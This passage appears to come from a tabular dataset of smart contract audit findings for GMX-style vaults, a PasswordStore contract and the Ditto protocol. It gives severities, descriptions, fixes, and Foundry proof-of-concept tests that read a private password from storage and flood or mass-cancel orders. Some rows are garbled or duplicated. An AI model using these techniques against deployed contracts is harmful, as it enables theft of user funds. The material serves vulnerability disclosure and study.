totalSupply_ == 0) return SAFE_MULTIPLIER;\\n return equityValue_ * SAFE_MULTIPLIER / totalSupply_;\\n }\\n```\\n +The `afterWithdrawChecks` applies only if user wants to withdraw in tokenA/B,high,"The `afterWithdrawChecks` check is very important to be sure that important health parameters are in the proper ranges. But the check is inside brackets of the `if user wants to withdraw in tokenA/B` statement. So if the user wants to withdraw LP-token the check is not provided. This can cause unexpected financial losses.\\nThe `afterWithdrawChecks` check is placed inside the brackets of the if-statement of the `GMXProcessWithdraw.processWithdraw` function. This statement checks `if user wants to withdraw in tokenA/B`. In other cases the `afterWithdrawChecks` check is not provided but should.\\n```\\n 69 // Else if user wants to withdraw in LP token, the tokensToUser is already previously\\n 70 // set in GMXWithdraw.withdraw()\\n 71 if (\\n 72 self.withdrawCache.withdrawParams.token == address(self.tokenA) ||\\n 73 self.withdrawCache.withdrawParams.token == address(self.tokenB)\\n 74 ) {\\n\\n104 GMXChecks.afterWithdrawChecks(self);\\n105 }\\n106 } \\n```\\n",I suppose that the check should be placed after the if statement brackets.,The issue can cause unexpected financial losses.\\nTools used\\nManual Review,"```\\n 69 // Else if user wants to withdraw in LP token, the tokensToUser is already previously\\n 70 // set in GMXWithdraw.withdraw()\\n 71 if (\\n 72 self.withdrawCache.withdrawParams.token == address(self.tokenA) ||\\n 73 self.withdrawCache.withdrawParams.token == address(self.tokenB)\\n 74 ) {\\n\\n104 GMXChecks.afterWithdrawChecks(self);\\n105 }\\n106 } \\n```\\n" +Owner's password stored in the `s_password` state variable is not a secret and can be seen by everyone,high,"The protocol is using a `private` state variable to store the owner's password under the assumption that being a ""private"" variable its value is a secret from everyone else except the owner; which is a completely false assumption.\\nIn Solidity, marking a variable as `private` doesn't mean that the data stored in that variable is entirely secret or `private` from all observers of the blockchain. While it restricts direct external access to the variable from other contracts, it's essential to understand that the data on the blockchain is inherently transparent and can be viewed by anyone. Other smart contracts and blockchain explorers can still access and read the data if they know where to look.\\n'Private' in Solidity primarily provides encapsulation and access control within the contract itself, rather than offering complete data privacy on the public blockchain.\\n```\\nstring private s_password;\\n```\\n\\nAforementioned is the `s_password` variable which is being assumed as a secret by the protocol for it being a `private` variable. This is a completely false assumption since all data on the blockchain is public.\\nActors:\\nAttacker: Any non-owner malicious actor on the network.\\nVictim: Owner of the PasswordStore protocol.\\nProtocol: PasswordStore is meant to allow only the owner to store and retrieve their password securely.\\nWorking Test Case:\\n(Note : Though the following code fetches the Victim's password correctly in ASCII format; with my current skills in Solidity I've been struggling to make the `assertEq()` function return `true` when comparing the two strings. The problem seems to be with how the result of `abi.encodePacked()` for `anyoneCanReadPassword` variable fetched from `vm.load` has a bunch of trailing zeroes in it while the same for `victimPassword` doesn't.\\nTherefore my current POC proves the exploit by using `console.log` instead of `assertEq` )\\nWrite and run the following test case in the `PasswordStore.t.sol` test file.\\n```\\nfunction test_any_non_owner_can_see_password() public {\\n string memory victimPassword = ""mySecretPassword""; // Defines Victim's (Owner's) password\\n vm.startPrank(owner); // Simulates Victim's address for the next call\\n passwordStore.setPassword(victimPassword); // Victim sets their password\\n\\n // At this point, Victim thinks their password is now ""privately"" stored on the protocol and is completely secret.\\n // The exploit code that now follows can be performed by just about everyone on the blockchain who are aware of the Victim's protocol and can access and read the Victim's password.\\n\\n /////////// EXPLOIT CODE performed by Attacker ///////////\\n\\n // By observing the protocol's source code at `PasswordStore.sol`, we notice that `s_password` is the second storage variable declared in the contract. Since storage slots are alloted in the order of declaration in the EVM, its slot value will be '1'\\n uint256 S_PASSWORD_STORAGE_SLOT_VALUE = 1;\\n\\n // Access the protocol's storage data at slot 1\\n bytes32 slotData = vm.load(\\n address(passwordStore),\\n bytes32(S_PASSWORD_STORAGE_SLOT_VALUE)\\n );\\n\\n // Converting `bytes` data to `string`\\n string memory anyoneCanReadPassword = string(\\n abi.encodePacked(slotData)\\n );\\n // Exposes Victim's password on console\\n console.log(anyoneCanReadPassword);\\n}\\n```\\n\\nMake sure to run the test command with `-vv` flag to see the `Logs` in command output.","All data on the blockchain is public. To store sensitive information, additional encryption or off-chain solutions should be considered. Sensitive and personal data should never be stored on the blockchain in plaintext or weakly encrypted or encoded format.",This vulnerability completely compromises the confidentiality of the protocol and exposes the sensitive private data of the owner of the protocol to everyone on the blockchain.,```\\nstring private s_password;\\n```\\n +No check if bridge already exists,low,"In the current `createBridge` function of the OwnerFacet.sol contract, a critical check to verify if the bridge already exists is missing. This omission can potentially result in double accounting in the yield generation process.\\nIn the rest of the OwnerFacet.sol contract functionality, there are checks in place to prevent the recreation of Vaults or Markets. However, this essential check is absent in the `createBridge()` function. The absence of this check can lead to the unintended creation of duplicate bridges, resulting in double accounting of yield if multiple vaults utilize the same bridge more than once. You can find the missing check in the code here: Link to code.\\nThe potential for double accounting of yield is evident in the following code block:\\n```\\nfunction getZethTotal(uint256 vault) internal view returns (uint256 zethTotal) {\\n AppStorage storage s = appStorage();\\n address[] storage bridges = s.vaultBridges[vault];\\n uint256 bridgeCount = bridges.length;\\n\\n for (uint256 i; i < bridgeCount;) {\\n zethTotal += IBridge(bridges[i]).getZethValue(); \\n unchecked {\\n ++i;\\n }\\n }\\n}\\n```\\n\\nTo demonstrate this behavior, a simple Proof of Concept (PoC) was created. (The test was placed in the Yield.t.sol file.)\\n```\\nfunction test_double_bridge_push() public {\\n vm.prank(owner);\\n diamond.createBridge(_bridgeReth, Vault.CARBON, 0, 0);\\n diamond.getUndistributedYield(Vault.CARBON); \\n assert(diamond.getUndistributedYield(Vault.CARBON) > 0); // As no yield was generated, this should not be true, but in current situation, it is a proof of double accounting.\\n}\\n```\\n","No check if bridge already exists\\nTo address this vulnerability, it is recommended to add the following mitigation to the createBridge function:\\n```\\n// rest of code\\n// Add the line below\\n for (uint i = 0; i < s.vaultBridges[vault].length; i// Add the line below\\n// Add the line below\\n) {\\n// Add the line below\\n if (s.vaultBridges[vault][i] == bridge) {\\n// Add the line below\\n revert Errors.BridgeAlreadyExist();\\n// Add the line below\\n }\\n// Add the line below\\n }\\n```\\n\\nThis change will prevent the inadvertent creation of duplicate bridges and mitigate the risk of double accounting of yield.","In specific circumstances, if a DAO proposal is confirmed, it could inadvertently trigger the creation of a bridge with the same address for a vault that already uses it. This scenario can lead to double accounting of yield and, as a consequence, potentially expose the protocol to vulnerabilities such as Denial of Service and yield theft.\\nHowever, it's important to note that the likelihood of this issue occurring is relatively low, and the function is governed by the DAO. After discussing this with the sponsor, we have classified this finding as low severity.",```\\nfunction getZethTotal(uint256 vault) internal view returns (uint256 zethTotal) {\\n AppStorage storage s = appStorage();\\n address[] storage bridges = s.vaultBridges[vault];\\n uint256 bridgeCount = bridges.length;\\n\\n for (uint256 i; i < bridgeCount;) {\\n zethTotal += IBridge(bridges[i]).getZethValue(); \\n unchecked {\\n ++i;\\n }\\n }\\n}\\n```\\n +Loss of precision in `twapPriceInEther` due to division before multiplication,low,"When calculating `twapPriceInEther`, `twapPrice` is divided by 1e6 before multiplication with 1e18 is done.\\n```\\n function baseOracleCircuitBreaker(\\n uint256 protocolPrice,\\n uint80 roundId,\\n int256 chainlinkPrice,\\n uint256 timeStamp,\\n uint256 chainlinkPriceInEth\\n ) private view returns (uint256 _protocolPrice) {\\n \\n // more code\\n\\n if (invalidFetchData || priceDeviation) {\\n uint256 twapPrice = IDiamond(payable(address(this))).estimateWETHInUSDC(\\n Constants.UNISWAP_WETH_BASE_AMT, 30 minutes\\n );\\n uint256 twapPriceInEther = (twapPrice / Constants.DECIMAL_USDC) * 1 ether;\\n```\\n\\nhttps://github.com/Cyfrin/2023-09-ditto/blob/a93b4276420a092913f43169a353a6198d3c21b9/contracts/libraries/LibOracle.sol#L64-L85\\nAccording to the above calculation, the `twapPrice` obtained would be precise upto 6 decimal places. Performing division before multiplying with 1e18 will result in loss of this precision and.\\nExample Scenario\\n```\\ntwapPrice = 1902501929\\ntwapPriceInEther = 1902000000000000000000\\n\\n// if multiplication is performed earlier,\\ntwapPriceInEther = 1902501929000000000000\\n```\\n","Perform the multiplication before division.\\n```\\ndiff // Remove the line below\\n// Remove the line below\\ngit a/contracts/libraries/LibOracle.sol b/contracts/libraries/LibOracle.sol\\nindex 23d1d0a..6962ad7 100644\\n// Remove the line below\\n// Remove the line below\\n// Remove the line below\\n a/contracts/libraries/LibOracle.sol\\n// Add the line below\\n// Add the line below\\n// Add the line below\\n b/contracts/libraries/LibOracle.sol\\n@@ // Remove the line below\\n82,7 // Add the line below\\n82,7 @@ library LibOracle {\\n uint256 twapPrice = IDiamond(payable(address(this))).estimateWETHInUSDC(\\n Constants.UNISWAP_WETH_BASE_AMT, 30 minutes\\n );\\n// Remove the line below\\n uint256 twapPriceInEther = (twapPrice / Constants.DECIMAL_USDC) * 1 ether;\\n// Add the line below\\n uint256 twapPriceInEther = (twapPrice * 1 ether) / Constants.DECIMAL_USDC;\\n uint256 twapPriceInv = twapPriceInEther.inv();\\n if (twapPriceInEther == 0) {\\n revert Errors.InvalidTwapPrice();\\n```\\n",Price used can have -1 (in 18 decimals) difference from the original price.,"```\\n function baseOracleCircuitBreaker(\\n uint256 protocolPrice,\\n uint80 roundId,\\n int256 chainlinkPrice,\\n uint256 timeStamp,\\n uint256 chainlinkPriceInEth\\n ) private view returns (uint256 _protocolPrice) {\\n \\n // more code\\n\\n if (invalidFetchData || priceDeviation) {\\n uint256 twapPrice = IDiamond(payable(address(this))).estimateWETHInUSDC(\\n Constants.UNISWAP_WETH_BASE_AMT, 30 minutes\\n );\\n uint256 twapPriceInEther = (twapPrice / Constants.DECIMAL_USDC) * 1 ether;\\n```\\n" +`onERC721Received()` callback is never called when new tokens are minted in Erc721Facet.sol,low,"The ERC721Facet contract does not properly call the corresponding callback when new tokens are minted. The ERC721 standard states that the onERC721Received callback must be called when a mint or transfer operation occurs. However, the smart contracts interacting as users with `Erc721Facet.mintNFT()` will not be notified with the onERC721Received callback, as expected according to the ERC721 standard.\\n`onErc721Received()` isn't called on minting:\\n```\\n function mintNFT(address asset, uint8 shortRecordId)\\n external\\n isNotFrozen(asset)\\n nonReentrant\\n onlyValidShortRecord(asset, msg.sender, shortRecordId)\\n {\\n if (shortRecordId == Constants.SHORT_MAX_ID) {\\n revert Errors.CannotMintLastShortRecord();\\n }\\n STypes.ShortRecord storage short =\\n s.shortRecords[asset][msg.sender][shortRecordId];\\n\\n if (short.tokenId != 0) revert Errors.AlreadyMinted();\\n\\n s.nftMapping[s.tokenIdCounter] = STypes.NFT({\\n owner: msg.sender,\\n assetId: s.asset[asset].assetId,\\n shortRecordId: shortRecordId\\n });\\n\\n short.tokenId = s.tokenIdCounter;\\n\\n //@dev never decreases\\n s.tokenIdCounter += 1;\\n }\\n```\\n",Call `onErc721Received()`,It can create interoperability issues with users' contracts,"```\\n function mintNFT(address asset, uint8 shortRecordId)\\n external\\n isNotFrozen(asset)\\n nonReentrant\\n onlyValidShortRecord(asset, msg.sender, shortRecordId)\\n {\\n if (shortRecordId == Constants.SHORT_MAX_ID) {\\n revert Errors.CannotMintLastShortRecord();\\n }\\n STypes.ShortRecord storage short =\\n s.shortRecords[asset][msg.sender][shortRecordId];\\n\\n if (short.tokenId != 0) revert Errors.AlreadyMinted();\\n\\n s.nftMapping[s.tokenIdCounter] = STypes.NFT({\\n owner: msg.sender,\\n assetId: s.asset[asset].assetId,\\n shortRecordId: shortRecordId\\n });\\n\\n short.tokenId = s.tokenIdCounter;\\n\\n //@dev never decreases\\n s.tokenIdCounter += 1;\\n }\\n```\\n" +[L-4] Yield update will not happen at the 1k ETH threshold,low,"Yield updates happen for a vault when the `BRIDGE_YIELD_UPDATE_THRESHOLD` is met for the vault after a large bridge deposit. The `maybeUpdateYield` function handles this logic for updates when that happens (1000 ETH to be exact).\\nThreshold constant from:\\n```\\nFILE: 2023-09-ditto/contracts/libraries/Constants.sol\\n\\nLine 17:\\nuint256 internal constant BRIDGE_YIELD_UPDATE_THRESHOLD = 1000 ether;\\n\\nLine 18:\\nuint256 internal constant BRIDGE_YIELD_PERCENT_THRESHOLD = 0.01 ether; // 1%\\n```\\n\\n```\\nFILE: 2023-09-ditto/contracts/facets/BridgeRouterFacet.sol\\n\\nfunction maybeUpdateYield(uint256 vault, uint88 amount) private {\\n uint88 zethTotal = s.vault[vault].zethTotal;\\n if (\\n zethTotal > Constants.BRIDGE_YIELD_UPDATE_THRESHOLD\\n && amount.div(zethTotal) > Constants.BRIDGE_YIELD_PERCENT_THRESHOLD\\n ) { // @audit should be >= to account for when threshold is met\\n // Update yield for ""large"" bridge deposits\\n vault.updateYield();\\n }\\n }\\n```\\n",Change the `>` operand in the `maybeUpdateYield` function to be `>=`.,In reality the yield update for the vault will not happen in the instances of 1000 ETH deposits unless the bridge deposit amount into the vault is > 1000 ETH and the percent is greater than 1%.,```\\nFILE: 2023-09-ditto/contracts/libraries/Constants.sol\\n\\nLine 17:\\nuint256 internal constant BRIDGE_YIELD_UPDATE_THRESHOLD = 1000 ether;\\n\\nLine 18:\\nuint256 internal constant BRIDGE_YIELD_PERCENT_THRESHOLD = 0.01 ether; // 1%\\n```\\n +"If the dao removes a bridge, user's deposited tokens for that bridge will be lost.",low,"If the dao removes a bridge for any (non-malicious) reason, user's deposited tokens for that bridge will be lost.\\nIn the `OwnerFacet.sol` the dao of the system has the option to remove a bridge by calling the `deleteBridge()` function. There is no check if there are any assets in the bridge. Also users may deposit funds in the bridge during the voting period.\\nPOC Add the following function in the `BridgeRouter.t.sol`\\n```\\nfunction test_DeleteBridgeWithAssets() public {\\n console.log(""Sender ethEscrowed in vault 2 before deposit: "", diamond.getVaultUserStruct(2, sender).ethEscrowed);\\n deal(_rethA, sender, 10000 ether);\\n\\n vm.startPrank(sender);\\n uint88 deposit1 = 1000 ether;\\n uint88 withdrawAmount = 100 ether;\\n diamond.deposit(_bridgeRethToBeDeleted, deposit1);\\n console.log(""Sender ethEscrowed in vault2 after deposit: "", diamond.getVaultUserStruct(2, sender).ethEscrowed);\\n diamond.withdraw(_bridgeRethToBeDeleted, withdrawAmount);\\n console.log(""Sender ethEscrowed after withdraw: "", diamond.getVaultUserStruct(2, sender).ethEscrowed);\\n vm.stopPrank();\\n\\n console.log(""Balance of reth in the bridgeRethToBeDeleted: "", rethA.balanceOf(_bridgeRethToBeDeleted));\\n\\n /// INFO: DAO deletes the bridge after a vote has been passed\\n vm.startPrank(owner) ;\\n diamond.deleteBridge(_bridgeRethToBeDeleted);\\n vm.stopPrank();\\n\\n vm.startPrank(sender);\\n vm.expectRevert();\\n diamond.withdraw(_bridgeRethToBeDeleted, withdrawAmount);\\n console.log(""Balance of reth in the bridgeRethToBeDeleted: "", rethA.balanceOf(_bridgeRethToBeDeleted));\\n vm.stopPrank();\\n }\\n```\\n\\nIn order to run this test, you also have to add\\n```\\n rethA.approve(\\n _bridgeRethToBeDeleted,\\n 0xffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff\\n );\\n```\\n\\nto `setUp()` function of the `BridgeROuter.t.sol` contract\\nIn `DeployHelper.sol` another bridge and vault have to be added in order for the test to run:\\n```\\n/// INFO: added by auditor\\n IBridge public bridgeRethToBeDeleted;\\n address public _bridgeRethToBeDeleted;\\n IAsset public zethToBeDeletedVault;\\n address public _zethToBeDeletedVault;\\n IRocketStorage public rocketStorageA;\\n address public _rocketStorageA;\\n IRocketTokenRETH public rethA;\\n address public _rethA;\\n```\\n\\nAdd the following to `deployContracts()` function\\n```\\nif (chainId == 31337) {\\n //mocks\\n _immutableCreate2Factory = deployCode(""ImmutableCreate2Factory.sol"");\\n\\n if (isMock) {\\n _steth = deployCode(""STETH.sol"");\\n _unsteth = deployCode(""UNSTETH.sol"", abi.encode(_steth));\\n _rocketStorage = deployCode(""RocketStorage.sol"");\\n _reth = deployCode(""RocketTokenRETH.sol"");\\n reth = IRocketTokenRETH(_reth);\\n _ethAggregator = deployCode(""MockAggregatorV3.sol"");\\n /// INFO: added by auditor\\n _rocketStorageA = deployCode(""RocketStorage.sol"");\\n _rethA = deployCode(""RocketTokenRETH.sol"");\\n rethA = IRocketTokenRETH(_rethA);\\n }\\n\\n rocketStorage = IRocketStorage(_rocketStorage);\\n /// INFO: added by auditor\\n rocketStorageA = IRocketStorage(_rocketStorageA);\\n steth = ISTETH(_steth);\\n unsteth = IUNSTETH(payable(_unsteth));\\n ethAggregator = IMockAggregatorV3(_ethAggregator);\\n }\\n\\n/// INFO: Added by auditor \\n _zethToBeDeletedVault = factory.safeCreate2(\\n salt,\\n abi.encodePacked(\\n vm.getCode(""Asset.sol:Asset""), abi.encode(_diamond, ""Zebra ETH Two"", ""ZETHT"")\\n )\\n );\\n\\n _bridgeRethToBeDeleted = factory.safeCreate2(\\n salt,\\n abi.encodePacked(\\n vm.getCode(""BridgeReth.sol:BridgeReth""),\\n abi.encode(_rocketStorageA, _diamond)\\n )\\n );\\n\\n bridgeRethToBeDeleted = IBridge(_bridgeRethToBeDeleted);\\n MTypes.CreateVaultParams memory vaultParams;\\n vaultParams.zethTithePercent = 10_00;\\n vaultParams.dittoMatchedRate = 1;\\n vaultParams.dittoShorterRate = 1;\\n diamond.createVault({zeth: _zeth, vault: Vault.CARBON, params: vaultParams});\\n\\n MTypes.CreateVaultParams memory vaultParamsTwo;\\n vaultParamsTwo.zethTithePercent = 9_00;\\n vaultParamsTwo.dittoMatchedRate = 1;\\n vaultParamsTwo.dittoShorterRate = 1;\\n zethToBeDeletedVault = IAsset(_zethToBeDeletedVault);\\n diamond.createVault({zeth: _zethToBeDeletedVault, vault: 2, params: vaultParamsTwo});\\n STypes.Vault memory carbonVaultConfigTwo = diamond.getVaultStruct(2);\\n assertEq(carbonVaultConfigTwo.zethTithePercent, 9_00);\\n\\n diamond.createBridge({\\n bridge: _bridgeRethToBeDeleted,\\n vault: 2,\\n withdrawalFee: 150,\\n unstakeFee: 0\\n });\\n \\n if (isMock) {\\n rocketStorage.setDeposit(_reth);\\n rocketStorage.setReth(_reth);\\n /// INFO: added by auditor\\n rocketStorageA.setDeposit(_rethA);\\n rocketStorageA.setReth(_rethA);\\n _setETH(4000 ether);\\n }\\n```\\n\\nTo run the test use `forge test -vvv --mt test_DeleteBridgeWithAsset`",In `deleteBridge()` make sure that the contract doesn't have any assets,"User's deposited `RETH` or `STETH` in that bridge will be lost, as the user doesn't have the option to withdraw them. Because the withdraw functions can only be called trough the `Diamond.sol`","```\\nfunction test_DeleteBridgeWithAssets() public {\\n console.log(""Sender ethEscrowed in vault 2 before deposit: "", diamond.getVaultUserStruct(2, sender).ethEscrowed);\\n deal(_rethA, sender, 10000 ether);\\n\\n vm.startPrank(sender);\\n uint88 deposit1 = 1000 ether;\\n uint88 withdrawAmount = 100 ether;\\n diamond.deposit(_bridgeRethToBeDeleted, deposit1);\\n console.log(""Sender ethEscrowed in vault2 after deposit: "", diamond.getVaultUserStruct(2, sender).ethEscrowed);\\n diamond.withdraw(_bridgeRethToBeDeleted, withdrawAmount);\\n console.log(""Sender ethEscrowed after withdraw: "", diamond.getVaultUserStruct(2, sender).ethEscrowed);\\n vm.stopPrank();\\n\\n console.log(""Balance of reth in the bridgeRethToBeDeleted: "", rethA.balanceOf(_bridgeRethToBeDeleted));\\n\\n /// INFO: DAO deletes the bridge after a vote has been passed\\n vm.startPrank(owner) ;\\n diamond.deleteBridge(_bridgeRethToBeDeleted);\\n vm.stopPrank();\\n\\n vm.startPrank(sender);\\n vm.expectRevert();\\n diamond.withdraw(_bridgeRethToBeDeleted, withdrawAmount);\\n console.log(""Balance of reth in the bridgeRethToBeDeleted: "", rethA.balanceOf(_bridgeRethToBeDeleted));\\n vm.stopPrank();\\n }\\n```\\n" +Users Lose Funds and Market Functionality Breaks When Market Reachs 65k Id,high,"if the orderbook of any market reach 65,000 dao can call the function cancelOrderFarFromOracle multiple times to cancel many orders up to 1000 order in each transaction ,or anyone can cancle the last order in one call.the users who issued the canclled orders will lost thier deposits.and the canclled process is not limited to a certain orders numbers.\\nsource : contracts/facets/OrderFacet.sol\\nFunction : cancelOrderFarFromOracle\\nwhen ever a user create a limit order (short limit,bid limit,ask limit), if the order did not match it get added to the orderbook, and the `assets amount` or `eth amount` uses to create this order is taken from the Virtual balance of the user in the system .\\nuserVault(in case of `bids` and shorts) or userAsset(in case of asks) we can see that here :\\n` // for asks:\\n s.assetUser[asset][order.addr].ercEscrowed -= order.ercAmount;\\n // for `shorts` :\\n s.vaultUser[vault][order.addr].ethEscrowed -= eth;\\n //for `bids` :\\n s.vaultUser[vault][order.addr].ethEscrowed -= eth;`\\nalso if there is no id's Recycled behind the Head the id for this orders gonna be the current id in s.asset[asset].orderId,and the `s.asset[asset].orderId` get increamented by one . this is true for all three types of orders. (shorts,asks,bids).\\nnow in case this ordersId reach 65k for a specific market, the DAO are able to cancle the last 1000 order, and any one can cancle last order in one call. since it's only checks for the ordersId > 65000.and by the last order i mean the last order of any time of limit orders (asks,shorts,bids).\\n`function cancelOrderFarFromOracle(address asset, O orderType, uint16 lastOrderId, uint16 numOrdersToCancel)\\n external\\n onlyValidAsset(asset)\\n nonReentrant\\n{\\n if (s.asset[asset].orderId < 65000) {\\n revert Errors.OrderIdCountTooLow();\\n }\\n\\n if (numOrdersToCancel > 1000) {\\n revert Errors.CannotCancelMoreThan1000Orders();\\n }\\n\\n if (msg.sender == LibDiamond.diamondStorage().contractOwner) {\\n if (orderType == O.LimitBid && s.bids[asset][lastOrderId].nextId == Constants.TAIL) {\\n s.bids.cancelManyOrders(asset, lastOrderId, numOrdersToCancel);\\n } else if (orderType == O.LimitAsk && s.asks[asset][lastOrderId].nextId == Constants.TAIL) {\\n s.asks.cancelManyOrders(asset, lastOrderId, numOrdersToCancel);\\n } else if (orderType == O.LimitShort && s.shorts[asset][lastOrderId].nextId == Constants.TAIL) {\\n s.shorts.cancelManyOrders(asset, lastOrderId, numOrdersToCancel);\\n } else {\\n revert Errors.NotLastOrder();\\n }\\n } else {\\n //@dev if address is not DAO, you can only cancel last order of a side\\n if (orderType == O.LimitBid && s.bids[asset][lastOrderId].nextId == Constants.TAIL) {\\n s.bids.cancelOrder(asset, lastOrderId);\\n } else if (orderType == O.LimitAsk && s.asks[asset][lastOrderId].nextId == Constants.TAIL) {\\n s.asks.cancelOrder(asset, lastOrderId);\\n } else if (orderType == O.LimitShort && s.shorts[asset][lastOrderId].nextId == Constants.TAIL) {\\n s.shorts.cancelOrder(asset, lastOrderId);\\n } else {\\n revert Errors.NotLastOrder();\\n }\\n }\\n}\\n... ....\\n// cancle many orders no extra checks :\\nfunction cancelManyOrders(\\n mapping(address => mapping(uint16 => STypes.Order)) storage orders,\\n address asset,\\n uint16 lastOrderId,\\n uint16 numOrdersToCancel\\n ) internal {\\n uint16 prevId;\\n uint16 currentId = lastOrderId;\\n for (uint8 i; i < numOrdersToCancel;) {\\n prevId = orders[asset][currentId].prevId;\\n LibOrders.cancelOrder(orders, asset, currentId);\\n currentId = prevId;\\n unchecked {\\n ++i;\\n }\\n }\\n}\\n...... .....\\n// no extrac checks in cancleOrder() function also. it set the order to Cancelled , remove it from the list, and Set it to be reused:\\nfunction cancelOrder(mapping(address => mapping(uint16 => STypes.Order)) storage orders, address asset, uint16 id)\\n internal\\n {\\n uint16 prevHEAD = orders[asset][Constants.HEAD].prevId;\\n\\n // remove the links of ID in the market\\n // @dev (ID) is exiting, [ID] is inserted\\n // BEFORE: PREV <-> (ID) <-> NEXT\\n // AFTER : PREV <----------> NEXT\\n orders[asset][orders[asset][id].nextId].prevId = orders[asset][id].prevId;\\n orders[asset][orders[asset][id].prevId].nextId = orders[asset][id].nextId;\\n\\n // create the links using the other side of the HEAD\\n emit Events.CancelOrder(asset, id, orders[asset][id].orderType);\\n _reuseOrderIds(orders, asset, id, prevHEAD, O.Cancelled);\\n}`\\nas we said the user balance get decreaced by the `value` of it's order he created. but since the order is set to cancelled the user never gonna be able to recieve thier amount back.cause cancelled orders can't be matched Neither cancelled again.\\nEx:\\na user create a limit bid as follow : {price: 0.0001 ether, amount: 10000 ether}.\\nwhen this order get cancelled : the user will loose : 0.0001 * 10000 = `1 ether` ZETH (or ETH)\\nthe shorters will lose more then others since thier balance get decreaced by : PRICE * AMOUNT * MARGIN.\\nThe second issue is there is no limit for how many orders can be cancelled. you can cancel the whole orders in a market that reaches 65K `orderId`. `limits shorts` ,limits `asks` or `limit bids` .starting from the last one.since the only Conditionto be able to cancel orders is the asset order ID reached this number. and if it reachs it. it never decrease .even if there is alot of orders behind head(non active) to be reused.\\na malicious actor Can targeted this vulnerability by creating numerous tiny limit `asks` pushing the `orderId` to be too high .and he can do so by creating `ask` with a very high price and very small amount so he can pass the `MinEth` amount check, he can just with less then `1 cusd` (in case of cusd market) create a bunsh of limit `asks` orders .\\nPOC :\\nusing the the main repo setup for testing , here a poc shows how a malicious user can fill the orderbook with bunsh of tiny `limit asks` with little cost. and how you can cancle all orders in case the orderId reachs 65k. also that there is no refund for the users that created this orders.\\n```\\n// SPDX-License-Identifier: GPL-3.0-only\\npragma solidity 0.8.21;\\n\\nimport {Errors} from ""contracts/libraries/Errors.sol"";\\nimport {Events} from ""contracts/libraries/Events.sol"";\\nimport {STypes, MTypes, O} from ""contracts/libraries/DataTypes.sol"";\\nimport {Constants} from ""contracts/libraries/Constants.sol"";\\nimport ""forge-std/console.sol"";\\nimport {OBFixture} from ""test/utils/OBFixture.sol"";\\n// import {console} from ""contracts/libraries/console.sol"";\\n\\ncontract POC is OBFixture {\\n address[3] private bidders = [address(435433), address(423432523), address(522366)];\\n address[3] private shorters = [address(243422243242), address(52353646324532), address(40099)];\\n address attacker = address(3234);\\n function setUp() public override {\\n super.setUp();\\n }\\n\\n // an attacker can fill the order book with a bunsh of asks that have too high price and low asset \\n function test_fillWithAsks() public {\\n // create a bunsh of asks with a high price :\\n depositUsd(attacker, DEFAULT_AMOUNT * 10000);\\n uint balanceAssetBefore = diamond.getAssetBalance(asset,attacker);\\n // minAsk = 0.0001 ether . 0.0001 ether = x * 1 , x =0.0001 ether * 1 ether\\n vm.startPrank(attacker);\\n for (uint i ; i< 1000 ;i++){\\n createLimitAsk( 10**24, 10**10); \\n }\\n vm.stopPrank();\\n STypes.Order[] memory asks = diamond.getAsks(asset);\\n console.log(""tiny asks created : "", asks.length);\\n console.log( ""hack cost asset"", balanceAssetBefore - diamond.getAssetBalance(asset,attacker));\\n\\n }\\n function test_cancleOrders() public {\\n //set the assetid to 60000;\\n diamond.setOrderIdT(asset,64998);\\n // create multiple bids and 1 shorts\\n fundLimitBidOpt(DEFAULT_PRICE, DEFAULT_AMOUNT, bidders[0]); // id 64998\\n fundLimitShortOpt(uint80(DEFAULT_PRICE)*4, DEFAULT_AMOUNT, shorters[0]); //id 64999\\n fundLimitBidOpt(DEFAULT_PRICE*2, DEFAULT_AMOUNT, bidders[1]); // id 65000\\n fundLimitBidOpt(DEFAULT_PRICE*3 , DEFAULT_AMOUNT, bidders[2]); //id 65001\\n /* now we have the lists like this :\\n - for bids : Head <- Head <->65001<->65000<->64998->Tail\\n - for shorts: Head <- Head <->64999->Tail\\n */\\n\\n //lets cancle the all the bids :\\n canclebid(64998);\\n // - now : Head <-64998<-> Head <->65001<->65000->Tail\\n uint s1 = vm.snapshot();\\n vm.revertTo(s1);\\n canclebid(65000);\\n // - now : Head <-64998<->65000<-> Head <->65001->Tail\\n uint s2 = vm.snapshot();\\n vm.revertTo(s2);\\n canclebid(65001);\\n // - now : Head <-64998<->65000<->65001<-> Head ->Tail\\n // let's check the active bids :\\n STypes.Order[] memory Afterbids = diamond.getBids(asset);\\n // notice that we were able to delete all the bids even there was unActive ID's to be reused.\\n assertTrue(Afterbids.length == 0);\\n // also notice that the owners of this orders did not get refund thier zeth back that have been taken from them when they create this orders.\\n\\n for (uint i; i65001<->65000<->64998->Tail\\n - for shorts: Head <- Head <->64999->Tail\\n */\\n\\n //lets cancle the all the bids :\\n canclebid(64998);\\n // - now : Head <-64998<-> Head <->65001<->65000->Tail\\n uint s1 = vm.snapshot();\\n vm.revertTo(s1);\\n canclebid(65000);\\n // - now : Head <-64998<->65000<-> Head <->65001->Tail\\n uint s2 = vm.snapshot();\\n vm.revertTo(s2);\\n canclebid(65001);\\n // - now : Head <-64998<->65000<->65001<-> Head ->Tail\\n // let's check the active bids :\\n STypes.Order[] memory Afterbids = diamond.getBids(asset);\\n // notice that we were able to delete all the bids even there was unActive ID's to be reused.\\n assertTrue(Afterbids.length == 0);\\n // also notice that the owners of this orders did not get refund thier zeth back that have been taken from them when they create this orders.\\n\\n for (uint i; i 0) {\\n // Ensure enough blocks have passed\\n uint256 depositDelay = getUint(keccak256(abi.encodePacked(keccak256(""dao.protocol.setting.network""), ""network.reth.deposit.delay"")));\\n uint256 blocksPassed = block.number.sub(lastDepositBlock);\\n require(blocksPassed > depositDelay, ""Not enough time has passed since deposit"");\\n // Clear the state as it's no longer necessary to check this until another deposit is made\\n deleteUint(key);\\n }\\n }\\n }\\n```\\n\\nAny future changes made to this delay by the admins could potentially lead to a denial-of-service attack on the `BridgeRouterFacet::deposit` and `BridgeRouterFacet::withdraw` mechanism for the rETH bridge.","Possible DOS on deposit(), withdraw() and unstake() for BridgeReth, leading to user loss of funds\\nConsider modifying Reth bridge to obtain rETH only through the UniswapV3 pool, on average users will get less rETH due to the slippage, but will avoid any future issues with the deposit delay mechanism.","Currently, the delay is set to zero, but if RocketPool admins decide to change this value in the future, it could cause issues. Specifically, protocol users staking actions could prevent other users from unstaking for a few hours. Given that many users call the stake function throughout the day, the delay would constantly reset, making the unstaking mechanism unusable. It's important to note that this only occurs when stake() is used through the rocketDepositPool route. If rETH is obtained from the Uniswap pool, the delay is not affected.\\nAll the ETH swapped for rETH calling `BridgeReth::depositEth` would become irrecuperable, leading to a user bank 